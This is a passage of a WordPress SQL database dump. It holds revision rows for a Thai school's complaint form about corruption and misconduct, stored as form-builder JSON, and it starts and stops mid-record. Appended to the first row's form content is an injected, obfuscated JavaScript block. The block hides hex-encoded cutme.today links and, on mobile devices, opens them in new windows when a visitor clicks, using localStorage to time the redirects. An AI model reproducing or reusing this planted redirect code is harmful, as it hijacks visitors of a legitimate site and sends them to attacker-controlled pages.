e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"\\u0e04\\u0e23\\u0e39\\u0e1c\\u0e39\\u0e49\\u0e2a\\u0e2d\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e18\\u0e38\\u0e23\\u0e01\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"\\u0e19\\u0e31\\u0e01\\u0e01\\u0e32\\u0e23\\u0e20\\u0e32\\u0e23\\u0e42\\u0e23\\u0e07\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"5\":{\"label\":\"\\u0e2d\\u0e37\\u0e48\\u0e19 \\u0e46\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"description\":\"\",\"required\":\"1\",\"style\":\"classic\",\"size\":\"medium\",\"placeholder\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"9\":{\"id\":\"9\",\"type\":\"text\",\"label\":\"\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"8\":{\"id\":\"8\",\"type\":\"textarea\",\"label\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\",\"description\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14 \\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"10\":{\"id\":\"10\",\"type\":\"checkbox\",\"label\":\"\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23 \\/ \\u0e2b\\u0e25\\u0e31\\u0e01\\u0e10\\u0e32\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21 (\\u0e16\\u0e49\\u0e32\\u0e21\\u0e35) \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e08\\u0e31\\u0e14\\u0e2a\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e17\\u0e32\\u0e07 E-mail : 33010169@sisaketedu1.go.th\",\"choices\":{\"1\":{\"label\":\"\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"11\":{\"id\":\"11\",\"type\":\"text\",\"label\":\"\\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"12\":{\"id\":\"12\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c \\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"14\":{\"id\":\"14\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 (\\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07)\",\"format\":\"first-last\",\"description\":\"\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"15\":{\"id\":\"15\",\"type\":\"checkbox\",\"label\":\"\\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e02\\u0e2d\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e32\\u0e23 \\u0e2b\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e32\\u0e01\\u0e0e\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e2b\\u0e49\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e15\\u0e32\\u0e21\\u0e01\\u0e0e\\u0e2b\\u0e21\\u0e32\\u0e22\",\"choices\":{\"1\":{\"label\":\"\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"}},\"id\":\"474\",\"field_id\":16,\"settings\":{\"form_title\":\"\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a\",\"form_desc\":\"\",\"submit_text\":\"\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"33010169@sisaketedu1.go.th\",\"subject\":\"New \\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"33010169@sisaketedu1.go.th\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','474-revision-v1','','','2024-08-03 21:59:35','2024-08-03 14:59:35','',474,'http://pakhaeng.ssk.in.th/?p=517',0,'revision','',0),
(518,1,'2024-08-03 22:02:19','2024-08-03 15:02:19','{\"fields\":{\"2\":{\"id\":\"2\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"simple\",\"description\":\"\\u0e01\\u0e23\\u0e38\\u0e13\\u0e32\\u0e01\\u0e23\\u0e2d\\u0e01 \\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e19\\u0e32\\u0e21\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e43\\u0e2b\\u0e49\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"textarea\",\"label\":\"\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48\",\"description\":\"\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c (\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49)\",\"description\":\"\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 : 08x-xxx-xxxx\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 : xxx@email.com\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e19\\u0e32\\u0e21\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e16\\u0e39\\u0e01\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"simple\",\"description\":\"\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e0a\\u0e37\\u0e48\\u0e2d - \\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"16\":{\"id\":\"16\",\"type\":\"text\",\"label\":\"\\u0e15\\u0e33\\u0e41\\u0e2b\\u0e19\\u0e48\\u0e07\\/\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e16\\u0e39\\u0e01\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\\u0e01\\u0e23\\u0e38\\u0e13\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e38\\u0e15\\u0e33\\u0e41\\u0e2b\\u0e19\\u0e48\\u0e07\\/\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e16\\u0e39\\u0e01\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 \\u0e1c\\u0e39\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23 \\u0e04\\u0e23\\u0e39\\u0e1c\\u0e39\\u0e49\\u0e2a\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d \\u0e2d\\u0e37\\u0e48\\u0e19 \\u0e46 \",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"9\":{\"id\":\"9\",\"type\":\"text\",\"label\":\"\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"8\":{\"id\":\"8\",\"type\":\"textarea\",\"label\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\",\"description\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14 \\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"10\":{\"id\":\"10\",\"type\":\"checkbox\",\"label\":\"\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23 \\/ \\u0e2b\\u0e25\\u0e31\\u0e01\\u0e10\\u0e32\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21 (\\u0e16\\u0e49\\u0e32\\u0e21\\u0e35) 